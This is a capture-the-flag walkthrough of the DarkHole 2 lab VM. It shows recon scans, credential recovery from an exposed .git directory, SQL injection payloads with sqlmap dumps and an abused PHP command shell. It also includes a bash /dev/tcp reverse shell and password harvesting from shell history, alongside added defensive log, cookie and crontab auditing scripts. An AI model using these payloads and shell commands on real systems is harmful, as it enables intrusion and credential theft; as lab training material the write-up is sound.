Information Gathering

Note: a rare target VM that can be opened directly in VMware Workstation.

  • First check the Kali IP address:
root at kali in ~/darkhole2 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:be:8f:be brd ff:ff:ff:ff:ff:ff
inet 10.10.8.21/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1138sec preferred_lft 1138sec
inet6 fe80::ebaa:6e9f:e411:f446/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host Discovery

  • An Nmap scan turns up one IP: 10.10.8.143
root at kali in ~/darkhole2 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:55 CST
Nmap scan report for 10.10.8.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000077s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.19
Host is up (0.00089s latency).
MAC Address: 00:0C:29:9C:BC:7C (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000037s latency).
MAC Address: 00:50:56:F0:C8:C4 (VMware)
Nmap scan report for 10.10.8.21
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.66 seconds

Port Scanning

  • Scan for open ports:
root at kali in ~/darkhole2 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:55 CST
Nmap scan report for 10.10.8.19
Host is up (0.000045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
| 256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_ 256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.10.8.19:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: i changed login.php file for more secure
|_http-title: DarkHole V2
MAC Address: 00:0C:29:9C:BC:7C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

Service Identification

  • Identify the services behind the open ports:
root at kali in ~/darkhole2 
$ nmap -p22,80 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:56 CST
Nmap scan report for 10.10.8.19
Host is up (0.00053s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
| 256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_ 256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-git:
| 10.10.8.19:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: i changed login.php file for more secure
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole V2
MAC Address: 00:0C:29:9C:BC:7C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 10.10.8.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.76 seconds

Vulnerability Scanning

  • Run an Nmap vulnerability scan:
root at kali in ~/darkhole2 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.19 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:56 CST
Nmap scan report for 10.10.8.19
Host is up (0.00044s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.10.8.19:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: i changed login.php file for more secure
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.19
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.8.19:80/login.php
| Form id: email
|_ Form action:
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /login.php: Possible admin folder
| /.git/HEAD: Git folder
| /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_ /style/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
MAC Address: 00:0C:29:9C:BC:7C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 30.81 seconds
  • Looked over the reported vulnerabilities; none of them is useful.
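The scan reports twice that PHPSESSID is set without the HttpOnly flag. As an added example (not part of the original write-up and not a tool the author used), the Python checker below parses the Set-Cookie lines of a captured HTTP response and lists the hardening attributes each cookie is missing; the response headers and the session-id value are constructed. In PHP the corresponding fixes are the session.cookie_httponly, session.cookie_secure and session.cookie_samesite ini settings (Secure only helps once the site is served over HTTPS, which this target is not).

```python
# Attributes a session cookie should carry; SameSite must also have a safe value.
REQUIRED = ('HttpOnly', 'Secure', 'SameSite')


def parse_set_cookie(value):
    """Split a Set-Cookie header value into (name, value, {attr: val}).
    Attribute names are case-insensitive, so they are normalised to lower case."""
    parts = [p.strip() for p in value.split(';')]
    name, _, val = parts[0].partition('=')
    attrs = {}
    for p in parts[1:]:
        if not p:
            continue
        k, _, v = p.partition('=')
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), val, attrs


def audit_set_cookie(value):
    """Return (cookie name, list of missing hardening attributes) for one header value."""
    name, _, attrs = parse_set_cookie(value)
    missing = [a for a in REQUIRED if a.lower() not in attrs]
    # SameSite=None gives no CSRF protection, so it counts as missing too.
    if 'samesite' in attrs and attrs['samesite'].lower() not in ('lax', 'strict'):
        missing.append('SameSite=Lax|Strict')
    return name, missing


def audit_headers(raw_headers):
    """Audit every Set-Cookie line in a block of raw response headers.
    Returns {cookie_name: [missing attributes]} for the cookies that have problems."""
    problems = {}
    for line in raw_headers.splitlines():
        k, _, v = line.partition(':')
        if k.strip().lower() == 'set-cookie':
            name, missing = audit_set_cookie(v)
            if missing:
                problems[name] = missing
    return problems


# Constructed responses: the weak one mirrors what the scan above reported,
# the hardened one shows the same cookie with the attributes in place.
WEAK_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=constructedsessionid; path=/
Content-Type: text/html; charset=UTF-8
"""

HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=constructedsessionid; path=/; HttpOnly; Secure; SameSite=Lax
Content-Type: text/html; charset=UTF-8
"""

if __name__ == '__main__':
    for label, raw in (('weak', WEAK_RESPONSE), ('hardened', HARDENED_RESPONSE)):
        print(label, audit_headers(raw) or 'no findings')
```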

Directory Scanning

root at kali in ~/darkhole2 
$ dirsearch -u http://10.10.8.19 -o $PWD/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/darkhole2/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-12-03_22-57-49.log

Target: http://10.10.8.19/

[22:57:49] Starting:
[22:57:49] 301 - 305B - /js -> http://10.10.8.19/js/
[22:57:49] 200 - 3KB - /.git/
[22:57:49] 301 - 307B - /.git -> http://10.10.8.19/.git/
......

root at kali in ~/darkhole2
$ cat dirsearch.txt | grep 200
200 3KB http://10.10.8.19:80/.git/
200 73B http://10.10.8.19:80/.git/description
200 41B http://10.10.8.19:80/.git/COMMIT_EDITMSG
200 23B http://10.10.8.19:80/.git/HEAD
200 130B http://10.10.8.19:80/.git/config
200 4KB http://10.10.8.19:80/.git/hooks/
200 945B http://10.10.8.19:80/.git/info/
200 1KB http://10.10.8.19:80/.git/index
200 1KB http://10.10.8.19:80/.git/logs/
200 240B http://10.10.8.19:80/.git/info/exclude
200 554B http://10.10.8.19:80/.git/logs/HEAD
200 554B http://10.10.8.19:80/.git/logs/refs/heads/master
200 6KB http://10.10.8.19:80/.git/objects/
200 1KB http://10.10.8.19:80/.git/refs/
200 41B http://10.10.8.19:80/.git/refs/heads/master
200 1KB http://10.10.8.19:80/.idea/
200 279B http://10.10.8.19:80/.idea/modules.xml
200 2KB http://10.10.8.19:80/.idea/workspace.xml
200 940B http://10.10.8.19:80/config/
200 11B http://10.10.8.19:80/dashboard.php
200 740B http://10.10.8.19:80/index.php
200 740B http://10.10.8.19:80/index.php/login/
200 928B http://10.10.8.19:80/js/
200 1KB http://10.10.8.19:80/login.php

Exploitation

  • Visiting the discovered paths one by one, it is clearly a custom-built site:

[screenshot]

  • There is a back-end login page:

[screenshot]

  • The scan also turned up a .git directory, which suggests source-code leakage.

Git Source Leakage

  • For git source leakage there are two commonly used download tools:

    • wget
    • GitHack
  • wget is used for the demonstration here; download the contents of the .git directory with the following command:

root at kali in ~/darkhole2 
$ wget -r http://10.10.8.19/.git
--2023-12-03 23:06:14-- http://10.10.8.19/.git
Connecting to 10.10.8.19:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://10.10.8.19/.git/ [following]
--2023-12-03 23:06:14-- http://10.10.8.19/.git/
Reusing existing connection to 10.10.8.19:80.
HTTP request sent, awaiting response... 200 OK
Length: 2678 (2.6K) [text/html]
Saving to: ‘10.10.8.19/.git’

10.10.8.19/.git 100%[===================================================================>] 2.62K --.-KB/s in 0s

2023-12-03 23:06:14 (606 MB/s) - ‘10.10.8.19/.git’ saved [2678/2678]
......

root at kali in ~/darkhole2
$ ls -al
total 32
drwxr-xr-x 3 root root 4096 Dec 3 23:06 .
drwx------ 23 root root 4096 Dec 3 23:06 ..
drwxr-xr-x 5 root root 4096 Dec 3 23:06 10.10.8.19
-rw-r--r-- 1 root root 3067 Dec 3 22:58 dirsearch.txt
-rw-r--r-- 1 root root 665 Dec 3 22:55 nmap_ip.txt
-rw-r--r-- 1 root root 955 Dec 3 22:55 nmap_port.txt
-rw-r--r-- 1 root root 1565 Dec 3 22:56 nmap_server.txt
-rw-r--r-- 1 root root 1557 Dec 3 22:56 nmap_vuln.txt
  • Enter the saved directory and view the commit log:
root at kali in ~/darkhole2/10.10.8.19 (master●●) 
$ git log > git_log.txt

root at kali in ~/darkhole2/10.10.8.19 (master●●)
$ cat git_log.txt
commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date: Mon Aug 30 13:14:32 2021 +0300

i changed login.php file for more secure

commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date: Mon Aug 30 13:06:20 2021 +0300

I added login.php file with default credentials

commit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date: Mon Aug 30 13:02:44 2021 +0300

First Initialize
  • The file went through two revisions, and the commit after the first one says login.php was added with default credentials. Promising.
  • Use git to view the changed file contents:
root at kali in ~/darkhole2/10.10.8.19 (master●●) 
$ git diff a4d900a8d85e8938d3601f3cef113ee293028e10 > git_change.txt

root at kali in ~/darkhole2/10.10.8.19 (master●●)
$ cat git_change.txt
......
diff --git a/login.php b/login.php
index 8a0ff67..6545962 100644
--- a/login.php
+++ b/login.php
@@ -1,42 +1,30 @@
-<?php
-session_start();
-require 'config/config.php';
-if($_SERVER['REQUEST_METHOD'] == 'POST'){
- if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
- $_SESSION['userid'] = 1;
- header("location:dashboard.php");
- die();
- }
-
-}
-?>
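Review bot: the removed block compares a hard-coded email and password against user input with a plain `==`, and because those lines are in commit a4d900a8d85e8938d3601f3cef113ee293028e10 they stay readable in git history no matter what the "more secure" revision replaced them with; the credentials need to be rotated, not just edited out, and the `.git/` directory must stop being served by the web server, since the walkthrough reaches `lush@admin.com` / `321` from exactly this history. The replacement lines are elided in this excerpt, so nothing can be said about the new check itself.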
......
  • Jackpot: an email and a password appear here: lush@admin.com/321
  • The back-end login asks for exactly an email and a password, so try logging in.

SQL Injection

  • Successfully logged into the back end:

[screenshot]

  • Poked around; there are no real functional features.
  • But the URL carries a parameter, ?id=1, which very likely has one of two vulnerability classes:
    • horizontal/vertical access-control bypass (IDOR)
    • SQL injection
  • Tried several parameter values without any change, so the access-control bypass is out.
  • Try SQL injection:

[screenshot]

  • Entering a single quote blanks the page; promising. Try closing the quote:

[screenshot]

  • It works, so SQL injection is present. Two ways to proceed:
    • manual injection
    • SQLMap

Manual Injection

  • Start with manual injection, the usual routine:
# Determine the number of columns
?id=1' order by 1 --+ # page returns data normally
?id=1' order by 2 --+ # page returns data normally
?id=1' order by 3 --+ # page returns data normally
?id=1' order by 4 --+ # page returns data normally
?id=1' order by 5 --+ # page returns data normally
?id=1' order by 6 --+ # page returns data normally
?id=1' order by 7 --+ # page returns no data

# Determine which columns are echoed
?id=-1' union select 1,2,3,4,5,6 --+ # columns 2,3,5,6 are echoed

# Current database
?id=-1' union select 1,2,3,4,5,database() --+ # darkhole_2

# All databases
?id=-1' union select 1,2,3,4,5,group_concat(schema_name) from information_schema.schemata --+ # mysql,information_schema,performance_schema,sys,darkhole_2

# Table names in the darkhole_2 database
?id=-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema = 'darkhole_2' --+ # ssh,users

# Column names in the ssh table
?id=-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema = 'darkhole_2' and table_name = 'ssh' --+ # id,user,pass

# Data in the ssh table
?id=-1' union select 1,2,3,4,5,group_concat(id,'-',user,'-',pass) from ssh --+ # 1-jehad-fool

# Column names in the users table
?id=-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema = 'darkhole_2' and table_name = 'users' --+ # id,username,email,password,contact_number,address

# Data in the users table
?id=-1' union select 1,2,3,4,5,group_concat(id,'-',username,'-',email,'-',password) from users --+ # 1-Jehad Alqurashiasddasdasdas-lush@admin.com-321
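Both of the activities above, fetching the exposed `.git/` repository and the order-by/union probing of `dashboard.php?id=`, leave obvious traces in the web server's access log. As an added defender-side example (not from the original write-up and not a tool the author used), here is a small Python detector that parses Apache combined-format log lines and tags requests for `.git` internals and query parameters carrying the injection patterns shown above. The log lines are constructed to mirror this walkthrough's traffic, and the signatures are this example's own assumptions, not any product's rules.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" format; only the fields this detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Any path component named ".git" (HEAD, config, objects/...), but not ".gitignore".
GIT_INTERNAL_RE = re.compile(r'(^|/)\.git(/|$)')

# Assumed signatures for the probes used above: ORDER BY column counting,
# UNION SELECT reads, information_schema lookups and time-based SLEEP.
SQLI_RE = re.compile(
    r"\bunion\b.*\bselect\b|\border\s+by\s+\d+|information_schema|\bsleep\s*\(",
    re.IGNORECASE,
)


def parse_line(line):
    """Parse one access-log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def classify(entry):
    """Return the list of finding tags for one parsed entry."""
    tags = []
    parts = urlsplit(entry['target'])
    if GIT_INTERNAL_RE.search(unquote_plus(parts.path)):
        # A 200 means the repository was actually served, not merely probed for.
        tags.append('git-exposure' if entry['status'] == 200 else 'git-probe')
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decoding again also catches double-encoded probes.
        if SQLI_RE.search(unquote_plus(value)):
            tags.append('sqli:' + name)
    return tags


def scan_log(lines):
    """Run the detector over an iterable of log lines; return the flagged entries."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append({'ip': entry['ip'], 'target': entry['target'],
                             'status': entry['status'], 'tags': tags})
    return findings


# Constructed sample lines modelled on the traffic in this write-up.
SAMPLE_LOG = [
    '10.10.8.21 - - [03/Dec/2023:22:57:49 +0800] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "dirsearch/0.4.2"',
    '10.10.8.21 - - [03/Dec/2023:23:06:14 +0800] "GET /.git/logs/HEAD HTTP/1.1" 200 554 "-" "Wget/1.21"',
    '10.10.8.21 - - [03/Dec/2023:23:20:01 +0800] "GET /dashboard.php?id=1 HTTP/1.1" 200 740 "-" "Mozilla/5.0"',
    '10.10.8.21 - - [03/Dec/2023:23:25:10 +0800] "GET /dashboard.php?id=1%27%20order%20by%207%20--+ HTTP/1.1" 200 705 "-" "Mozilla/5.0"',
    '10.10.8.21 - - [03/Dec/2023:23:27:42 +0800] "GET /dashboard.php?id=-1%27%20union%20select%201,2,3,4,5,database()%20--+ HTTP/1.1" 200 760 "-" "Mozilla/5.0"',
    '10.10.8.30 - - [03/Dec/2023:23:40:00 +0800] "GET /.git/config HTTP/1.1" 404 274 "-" "curl/8.4.0"',
    '10.10.8.21 - - [03/Dec/2023:23:41:00 +0800] "GET /js/main.js HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<12} {f['status']} {','.join(f['tags']):<14} {f['target']}")
```

The `git-exposure` tag (a 200 on a `.git` path) is the one worth alerting on immediately: it means the repository, and with it the whole commit history, was handed out.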

SQLMap

  • Since the page sits behind a login, use Burp Suite to save an HTTP request as url.txt:

[screenshot]

  • Let SQLMap handle it in one go:
root at kali in ~/darkhole2 
$ sqlmap -r url.txt --batch -v 0 -D darkhole_2 --dump
......
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3953 FROM (SELECT(SLEEP(5)))dKlu) AND 'dcmE'='dcmE

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-8382' UNION ALL SELECT NULL,CONCAT(0x7176627071,0x775673597243587276705367565a5368437a4f774b7256745145427a6642704b5854524c79786165,0x7178707a71),NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
Database: darkhole_2
Table: ssh
[1 entry]
+----+------+--------+
| id | pass | user |
+----+------+--------+
| 1 | fool | jehad |
+----+------+--------+

Database: darkhole_2
Table: users
[1 entry]
+----+----------------+-------------------------------------------+----------+-----------------------------+----------------+
| id | email | address | password | username | contact_number |
+----+----------------+-------------------------------------------+----------+-----------------------------+----------------+
| 1 | lush@admin.com | Street, Pincode, Province/State, Country | 321 | Jehad Alqurashiasddasdasdas | 1 |
+----+----------------+-------------------------------------------+----------+-----------------------------+----------------+


[*] ending @ 23:47:06 /2023-12-03/
  • This command also works:
sqlmap -u 'http://10.10.8.19/dashboard.php?id=1' --batch -v 0 --cookie 'PHPSESSID=7lthum22ic3hqcfuk9auppj6es' -D darkhole_2 --dump

Information Gathering

  • The hint is clear enough: connect over SSH with the account and password extracted above:
root at kali in ~/darkhole2 
$ ssh jehad@10.10.8.19
jehad@10.10.8.19's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)
......
Last login: Fri Sep 3 05:49:05 2021 from 192.168.135.128
jehad@darkhole:~$ id
uid=1001(jehad) gid=1001(jehad) groups=1001(jehad)
  • But it is not root. Everything so far was probed by hand; now switch to a script, otherwise it gets tiring.
  • Download the linux-smart-enumeration script:
wget https://github.com/diego-treitos/linux-smart-enumeration/releases/download/4.13nw/lse.sh
  • Start a web server locally with Python:
root at kali in ~/darkhole2 
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
  • Download the file on the target:
jehad@darkhole:~$ wget http://10.10.8.21/lse.sh
--2023-12-03 16:42:39-- http://10.10.8.21/lse.sh
Connecting to 10.10.8.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54352 (53K) [text/x-sh]
Saving to: ‘lse.sh’

lse.sh 100%[===================================================================>] 53.08K --.-KB/s in 0s

2023-12-03 16:42:39 (340 MB/s) - ‘lse.sh’ saved [54352/54352]
  • Make it executable and run it:
jehad@darkhole:~$ chmod +x lse.sh ; ./lse.sh
---
If you know the current user password, write it here to check sudo privileges: fool
---
LSE Version: 4.13nw

User: jehad
User ID: 1001
Password: ******
Home: /home/jehad
Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
umask: 0002

Hostname: darkhole
Linux: 5.4.0-81-generic
......
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. yes!
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:* * * * * losy cd /opt/web && php -S localhost:9999
---
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
......
  • An important finding: /etc/crontab contains a scheduled task that appears to start a web service.
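What lse's ret060 check flagged is the general condition behind this finding: a cron job runs as one user out of a directory that another user can modify. As an added example (not from the write-up and not lse's own code), the Python script below re-implements that idea: it parses a system crontab, extracts the working directory and absolute paths each job depends on, and reports the ones a user other than root or the job's own user can change. The crontab text and the filesystem metadata are constructed; in particular, the ownership of /opt/web is an assumption made for the example, since the page does not say who owns it.

```python
import os
import pwd
import shlex
import stat
from dataclasses import dataclass


@dataclass
class PathInfo:
    owner: str   # user name that owns the path
    mode: int    # permission bits only (st_mode & 0o777)


def default_lookup(path):
    """Real filesystem lookup; returns None when the path does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return PathInfo(pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode))


def parse_system_crontab(text):
    """Return (user, command) pairs from text in /etc/crontab format:
    five time fields (or an @keyword), a user field, then the command.
    Blank lines, comments and VAR=value assignments are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or '=' in line.split(None, 1)[0]:
            continue
        maxsplit = 2 if line.startswith('@') else 6
        fields = line.split(None, maxsplit)
        if len(fields) == maxsplit + 1:
            jobs.append((fields[-2], fields[-1]))
    return jobs


def referenced_paths(command):
    """Paths a job depends on: the directory after `cd` and every absolute
    path token. Bare program names (php, run-parts) are resolved through
    PATH by cron and are deliberately not guessed at here."""
    paths = set()
    tokens = shlex.split(command)
    for i, tok in enumerate(tokens):
        if tok == 'cd' and i + 1 < len(tokens):
            paths.add(tokens[i + 1])
        elif tok.startswith('/'):
            paths.add(tok)
    return paths


def audit_crontab(text, lookup=default_lookup):
    """Report jobs whose referenced paths can be changed by someone other than
    root or the job's own user. Group-writable is flagged conservatively,
    because group membership is not examined."""
    findings = []
    for user, command in parse_system_crontab(text):
        for path in sorted(referenced_paths(command)):
            info = lookup(path)
            if info is None:
                continue
            reasons = []
            if info.mode & stat.S_IWOTH:
                reasons.append('world-writable')
            if info.mode & stat.S_IWGRP:
                reasons.append('group-writable')
            if info.owner not in ('root', user):
                reasons.append('owned by ' + info.owner)
            if reasons:
                findings.append({'user': user, 'path': path,
                                 'command': command, 'reasons': reasons})
    return findings


# Constructed crontab, modelled on the entry lse reported above.
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * losy cd /opt/web && php -S localhost:9999
"""

# Constructed metadata standing in for os.stat(); the owner and mode of
# /opt/web are assumptions for this example, the page does not state them.
FAKE_FS = {
    '/': PathInfo('root', 0o755),
    '/etc/cron.hourly': PathInfo('root', 0o755),
    '/opt/web': PathInfo('jehad', 0o775),
}

if __name__ == '__main__':
    for f in audit_crontab(CRONTAB, lookup=FAKE_FS.get):
        print(f"[{f['user']}] {f['path']}: {', '.join(f['reasons'])}  <- {f['command']}")
```

Run against the real host, `audit_crontab(open('/etc/crontab').read())` uses the default `os.stat` lookup; the fix the finding points at is to make the job's working directory owned by root or by the job's user with no group or world write bit, so that no other account can plant the file the job will serve.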

Reverse Shell via a Local File

  • Go into that directory:
jehad@darkhole:~$ cd /opt/web
jehad@darkhole:/opt/web$ ls
index.php
  • There is an index.php file; promising. View its contents:
jehad@darkhole:/opt/web$ cat index.php 
<?php
echo "Parameter GET['cmd']";
if(isset($_GET['cmd'])){
echo system($_GET['cmd']);
}
?>
  • This looks usable. Check which ports are currently open:
jehad@darkhole:/opt/web$ netstat -antlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9999 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 10.10.8.19:22 10.10.8.21:33122 ESTABLISHED -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
  • Port 9999 is indeed open, but it only listens locally, so craft the request with curl:
jehad@darkhole:/opt/web$ curl 'http://127.0.0.1:9999/?cmd=id'
Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)
  • It executes, so pop a reverse shell.
  • Start a listener on Kali:
root at kali in ~/darkhole2 
$ nc -lvvp 4444
listening on [any] 4444 ...
  • Build the Bash reverse-shell command on the target:
# bash -c 'bash -i &> /dev/tcp/10.10.8.21/4444 0>&1'
curl "http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%26%3E%20%2Fdev%2Ftcp%2F10.10.8.21%2F4444%200%3E%261%27"
  • Shell received:
root at kali in ~/darkhole2 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.19: inverse host lookup failed: Unknown host
connect to [10.10.8.21] from (UNKNOWN) [10.10.8.19] 44852
bash: cannot set terminal process group (1257): Inappropriate ioctl for device
bash: no job control in this shell
losy@darkhole:/opt/web$ id
id
uid=1002(losy) gid=1002(losy) groups=1002(losy)

user.txt

  • The flag is in losy's home directory:
losy@darkhole:~$ cat user.txt
cat user.txt
DarkHole{'This_is_the_life_man_better_than_a_cruise'}

Second Round of Information Gathering

  • The enumeration script from before sits in jehad's home directory, which is no longer accessible after switching users (a rookie mistake), so lse.sh has to be transferred again:
losy@darkhole:~$ wget http://10.10.8.21/lse.sh
wget http://10.10.8.21/lse.sh
--2023-12-03 17:07:44-- http://10.10.8.21/lse.sh
Connecting to 10.10.8.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54352 (53K) [text/x-sh]
Saving to: ‘lse.sh’

0K .......... .......... .......... .......... .......... 94% 335M 0s
50K ... 100% 5871G=0s

2023-12-03 17:07:44 (356 MB/s) - ‘lse.sh’ saved [54352/54352]

losy@darkhole:~$ chmod +x lse.sh ; ./lse.sh
chmod +x lse.sh ; ./lse.sh
---
If you know the current user password, write it here to check sudo privileges:
---

LSE Version: 4.13nw

User: losy
User ID: 1002
Password: none
......
[!] fst200 Are there possible credentials in any shell history file?....... yes!
---
password:gang
---
[!] fst210 Are there NFS exports with 'no_root_squash' option?............. nope
......
  • losy's shell history contains password:gang; try logging in over SSH:
root at kali in ~/darkhole2 
$ ssh losy@10.10.8.19
losy@10.10.8.19's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)
......
Last login: Fri Sep 3 04:09:48 2021 from 192.168.135.128
